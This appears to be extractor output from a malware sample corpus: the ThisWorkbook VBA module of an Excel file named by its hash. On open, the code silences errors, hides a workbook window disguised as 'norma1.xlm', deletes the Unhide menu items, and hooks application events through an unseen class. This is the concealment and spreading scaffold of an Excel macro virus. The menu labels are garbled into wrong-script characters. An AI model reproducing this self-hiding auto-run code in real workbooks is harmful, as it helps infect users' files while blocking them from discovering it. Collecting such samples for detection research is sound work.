Filename     : ./macros/1c3ef979311c80f77d4dab2d9b88beea0d227f3c9d166e10dd2a34e69dd61efa
OLE stream   : _VBA_PROJECT_CUR/VBA/ThisWorkbook
VBA filename : ThisWorkbook.cls
----------------------------------------
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Dim x As New 잚1
Private Sub Workbook_Open()
On Error Resume Next
Application.ShowWindowsInTaskbar = True
Application.Windows("norma1.xlm").Visible = False
MenuBars("Worksheet").Menus("목駕(&O)").MenuItems("묏鱗깊(&H)").MenuItems("혤句茶꾜(&U)...").Delete
MenuBars("Worksheet").Menus("눗왯(&W)").MenuItems("혤句茶꾜(&U)...").Delete
Set x.App = Application
If Workbooks.Count <= 1 Then
Workbooks.Add
End If

End Sub
